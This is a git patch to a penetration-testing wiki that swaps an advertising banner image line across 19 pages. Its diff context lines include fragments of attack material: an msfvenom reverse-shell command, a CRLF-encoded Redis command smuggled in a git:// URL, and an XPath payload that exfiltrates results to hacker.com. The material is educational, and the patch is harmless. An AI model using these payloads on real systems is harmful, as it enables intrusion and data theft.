From 233c08b7797b9c37881508c205502df5180efe04 Mon Sep 17 00:00:00 2001 From: Carlos Polop Date: Tue, 19 Nov 2024 12:36:42 +0100 Subject: [PATCH] hp --- README.md | 2 +- .../pentesting-wifi/README.md | 6 +++--- .../reverse-shells/msfvenom.md | 4 ++-- linux-hardening/linux-privilege-escalation-checklist.md | 4 ++-- .../macos-security-and-privilege-escalation/README.md | 4 ++-- mobile-pentesting/android-app-pentesting/README.md | 8 ++++---- network-services-pentesting/135-pentesting-msrpc.md | 4 ++-- network-services-pentesting/27017-27018-mongodb.md | 4 ++-- network-services-pentesting/5985-5986-pentesting-winrm.md | 6 +++--- network-services-pentesting/6000-pentesting-x11.md | 4 ++-- network-services-pentesting/6379-pentesting-redis.md | 6 +++--- .../8009-pentesting-apache-jserv-protocol-ajp.md | 4 ++-- network-services-pentesting/pentesting-ntp.md | 4 ++-- .../content-security-policy-csp-bypass/README.md | 6 +++--- pentesting-web/csrf-cross-site-request-forgery.md | 4 ++-- pentesting-web/file-inclusion/README.md | 6 +++--- pentesting-web/reset-password.md | 4 ++-- pentesting-web/xpath-injection.md | 4 ++-- .../active-directory-methodology/asreproast.md | 4 ++-- 19 files changed, 44 insertions(+), 44 deletions(-) diff --git a/README.md b/README.md index f07918b52..b4493330b 100644 --- a/README.md +++ b/README.md @@ -65,7 +65,7 @@ Get Access Today: ### [HACKENPROOF](https://bit.ly/3xrrDrL) -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! diff --git a/generic-methodologies-and-resources/pentesting-wifi/README.md b/generic-methodologies-and-resources/pentesting-wifi/README.md index 3d18f21de..ff6fc0344 100644 --- a/generic-methodologies-and-resources/pentesting-wifi/README.md +++ b/generic-methodologies-and-resources/pentesting-wifi/README.md @@ -15,7 +15,7 @@ Learn & practice GCP Hacking: {% endhint %} -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! @@ -310,7 +310,7 @@ So broken and unused nowdays. Just know that _**airgeddon**_ have a WEP option c *** -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! @@ -831,7 +831,7 @@ These methods, particularly PIN entry, are susceptible to the same vulnerabiliti TODO: Take a look to [https://github.com/wifiphisher/wifiphisher](https://github.com/wifiphisher/wifiphisher) (login con facebook e imitacionde WPA en captive portals) -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! diff --git a/generic-methodologies-and-resources/reverse-shells/msfvenom.md b/generic-methodologies-and-resources/reverse-shells/msfvenom.md index 682871289..775ec8757 100644 --- a/generic-methodologies-and-resources/reverse-shells/msfvenom.md +++ b/generic-methodologies-and-resources/reverse-shells/msfvenom.md @@ -15,7 +15,7 @@ Learn & practice GCP Hacking: {% endhint %} -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! @@ -235,7 +235,7 @@ msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f ``` {% endcode %} -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! diff --git a/linux-hardening/linux-privilege-escalation-checklist.md b/linux-hardening/linux-privilege-escalation-checklist.md index e2e154a5e..6b1f74f3e 100644 --- a/linux-hardening/linux-privilege-escalation-checklist.md +++ b/linux-hardening/linux-privilege-escalation-checklist.md @@ -15,7 +15,7 @@ Learn & practice GCP Hacking: {% endhint %} -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! @@ -168,7 +168,7 @@ Stay informed with the newest bug bounties launching and crucial platform update * [ ] Can you [**abuse NFS to escalate privileges**](privilege-escalation/#nfs-privilege-escalation)? * [ ] Do you need to [**escape from a restrictive shell**](privilege-escalation/#escaping-from-restricted-shells)? -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! diff --git a/macos-hardening/macos-security-and-privilege-escalation/README.md b/macos-hardening/macos-security-and-privilege-escalation/README.md index 60f75be29..b2e549da0 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/README.md +++ b/macos-hardening/macos-security-and-privilege-escalation/README.md @@ -15,7 +15,7 @@ Learn & practice GCP Hacking: {% endhint %} -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! @@ -145,7 +145,7 @@ Of course from a red teams perspective you should be also interested in escalati * [**https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ**](https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ) * [**https://www.youtube.com/watch?v=vMGiplQtjTY**](https://www.youtube.com/watch?v=vMGiplQtjTY) -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! diff --git a/mobile-pentesting/android-app-pentesting/README.md b/mobile-pentesting/android-app-pentesting/README.md index a393bdacb..fbea5128c 100644 --- a/mobile-pentesting/android-app-pentesting/README.md +++ b/mobile-pentesting/android-app-pentesting/README.md @@ -15,7 +15,7 @@ Learn & practice GCP Hacking: {% endhint %} -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! @@ -245,7 +245,7 @@ An application may contain secrets (API keys, passwords, hidden urls, subdomains *** -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! @@ -584,7 +584,7 @@ Probably you know about this kind of vulnerabilities from the Web. You have to b *** -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! @@ -841,7 +841,7 @@ AndroL4b is an Android security virtual machine based on ubuntu-mate includes th * [https://www.vegabird.com/yaazhini/](https://www.vegabird.com/yaazhini/) * [https://github.com/abhi-r3v0/Adhrit](https://github.com/abhi-r3v0/Adhrit) -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! diff --git a/network-services-pentesting/135-pentesting-msrpc.md b/network-services-pentesting/135-pentesting-msrpc.md index 8fc458e3c..77e8174a7 100644 --- a/network-services-pentesting/135-pentesting-msrpc.md +++ b/network-services-pentesting/135-pentesting-msrpc.md @@ -15,7 +15,7 @@ Learn & practice GCP Hacking: {% endhint %} -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! @@ -123,7 +123,7 @@ The **rpcdump.exe** from [rpctools](https://resources.oreilly.com/examples/97805 * [https://www.cyber.airbus.com/the-oxid-resolver-part-2-accessing-a-remote-object-inside-dcom/](https://www.cyber.airbus.com/the-oxid-resolver-part-2-accessing-a-remote-object-inside-dcom/) * [https://0xffsec.com/handbook/services/msrpc/](https://0xffsec.com/handbook/services/msrpc/) -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! diff --git a/network-services-pentesting/27017-27018-mongodb.md b/network-services-pentesting/27017-27018-mongodb.md index fe7e77d8b..281e48e4a 100644 --- a/network-services-pentesting/27017-27018-mongodb.md +++ b/network-services-pentesting/27017-27018-mongodb.md @@ -15,7 +15,7 @@ Learn & practice GCP Hacking: {% endhint %} -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! @@ -132,7 +132,7 @@ If you are root you can **modify** the **mongodb.conf** file so no credentials a *** -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! diff --git a/network-services-pentesting/5985-5986-pentesting-winrm.md b/network-services-pentesting/5985-5986-pentesting-winrm.md index 193080eb9..af07f7825 100644 --- a/network-services-pentesting/5985-5986-pentesting-winrm.md +++ b/network-services-pentesting/5985-5986-pentesting-winrm.md @@ -15,7 +15,7 @@ Learn & practice GCP Hacking: {% endhint %} -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! @@ -174,7 +174,7 @@ winrm quickconfig winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}' ``` -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! @@ -344,7 +344,7 @@ Entry_2: ​ -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! diff --git a/network-services-pentesting/6000-pentesting-x11.md b/network-services-pentesting/6000-pentesting-x11.md index da86b4725..ca91a3e9d 100644 --- a/network-services-pentesting/6000-pentesting-x11.md +++ b/network-services-pentesting/6000-pentesting-x11.md @@ -15,7 +15,7 @@ Learn & practice GCP Hacking: {% endhint %} -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! @@ -189,7 +189,7 @@ Then, put your IP address and port in the **R-Shell** option and click on **R-sh * `port:6000 x11` -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! diff --git a/network-services-pentesting/6379-pentesting-redis.md b/network-services-pentesting/6379-pentesting-redis.md index ca2225bca..2a7be3d88 100644 --- a/network-services-pentesting/6379-pentesting-redis.md +++ b/network-services-pentesting/6379-pentesting-redis.md @@ -15,7 +15,7 @@ Learn & practice GCP Hacking: {% endhint %} -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! @@ -161,7 +161,7 @@ DUMP **Dump the database with npm**[ **redis-dump**](https://www.npmjs.com/package/redis-dump) **or python** [**redis-utils**](https://pypi.org/project/redis-utils/) -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! @@ -347,7 +347,7 @@ git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agit _For some reason (as for the author of_ [_https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/_](https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/) _where this info was took from) the exploitation worked with the `git` scheme and not with the `http` scheme._ -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! diff --git a/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md b/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md index 0255d74c0..004df61f5 100644 --- a/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md +++ b/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md @@ -15,7 +15,7 @@ Learn & practice GCP Hacking: {% endhint %} -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! @@ -192,7 +192,7 @@ msf exploit(tomcat_mgr_deploy) > show options * [https://github.com/yaoweibin/nginx\_ajp\_module](https://github.com/yaoweibin/nginx\_ajp\_module) * [https://academy.hackthebox.com/module/145/section/1295](https://academy.hackthebox.com/module/145/section/1295) -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! diff --git a/network-services-pentesting/pentesting-ntp.md b/network-services-pentesting/pentesting-ntp.md index e9e4d0292..8e2d1431f 100644 --- a/network-services-pentesting/pentesting-ntp.md +++ b/network-services-pentesting/pentesting-ntp.md @@ -16,7 +16,7 @@ Learn & practice GCP Hacking:
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! @@ -110,7 +110,7 @@ Entry_2: ​ -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! diff --git a/pentesting-web/content-security-policy-csp-bypass/README.md b/pentesting-web/content-security-policy-csp-bypass/README.md index d501d1cca..09a2c8f49 100644 --- a/pentesting-web/content-security-policy-csp-bypass/README.md +++ b/pentesting-web/content-security-policy-csp-bypass/README.md @@ -15,7 +15,7 @@ Learn & practice GCP Hacking: {% endhint %} -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! @@ -694,7 +694,7 @@ Both methods exploit the nuances of CSP implementation and behavior in browsers, Trick from [**here**](https://ctftime.org/writeup/29310). -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! @@ -844,7 +844,7 @@ pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp); ​ -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! diff --git a/pentesting-web/csrf-cross-site-request-forgery.md b/pentesting-web/csrf-cross-site-request-forgery.md index b88afa369..7fc1a0f5c 100644 --- a/pentesting-web/csrf-cross-site-request-forgery.md +++ b/pentesting-web/csrf-cross-site-request-forgery.md @@ -15,7 +15,7 @@ Learn & practice GCP Hacking: {% endhint %} -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! @@ -624,7 +624,7 @@ with open(PASS_LIST, "r") as f: ​ -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! diff --git a/pentesting-web/file-inclusion/README.md b/pentesting-web/file-inclusion/README.md index c8da7cc3e..dc7aff8af 100644 --- a/pentesting-web/file-inclusion/README.md +++ b/pentesting-web/file-inclusion/README.md @@ -15,7 +15,7 @@ Learn & practice GCP Hacking: {% endhint %} -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! @@ -492,7 +492,7 @@ Similarly, for executing arbitrary system commands, one might use: It's important to **URL-encode these payloads**. -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! @@ -742,7 +742,7 @@ _Even if you cause a PHP Fatal Error, PHP temporary files uploaded are deleted._ {% file src="../../.gitbook/assets/EN-Local-File-Inclusion-1.pdf" %} -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! diff --git a/pentesting-web/reset-password.md b/pentesting-web/reset-password.md index 6fbc80af7..99d8a73d3 100644 --- a/pentesting-web/reset-password.md +++ b/pentesting-web/reset-password.md @@ -15,7 +15,7 @@ Learn & practice GCP Hacking: {% endhint %} -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! @@ -214,7 +214,7 @@ POST /api/changepass * [https://anugrahsr.github.io/posts/10-Password-reset-flaws/#10-try-using-your-token](https://anugrahsr.github.io/posts/10-Password-reset-flaws/#10-try-using-your-token) -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! diff --git a/pentesting-web/xpath-injection.md b/pentesting-web/xpath-injection.md index c623a76c6..c2b556d5d 100644 --- a/pentesting-web/xpath-injection.md +++ b/pentesting-web/xpath-injection.md @@ -15,7 +15,7 @@ Learn & practice GCP Hacking: {% endhint %} -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! @@ -318,7 +318,7 @@ doc-available(concat("http://hacker.com/oob/", RESULTS)) * [https://wiki.owasp.org/index.php/Testing\_for\_XPath\_Injection\_(OTG-INPVAL-010)](https://wiki.owasp.org/index.php/Testing\_for\_XPath\_Injection\_\(OTG-INPVAL-010\)) * [https://www.w3schools.com/xml/xpath\_syntax.asp](https://www.w3schools.com/xml/xpath\_syntax.asp) -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! diff --git a/windows-hardening/active-directory-methodology/asreproast.md b/windows-hardening/active-directory-methodology/asreproast.md index 00fc84ca4..8fe9a52ee 100644 --- a/windows-hardening/active-directory-methodology/asreproast.md +++ b/windows-hardening/active-directory-methodology/asreproast.md @@ -15,7 +15,7 @@ Learn & practice GCP Hacking: {% endhint %} -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! @@ -121,7 +121,7 @@ ASRepCatcher listen *** -
+
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!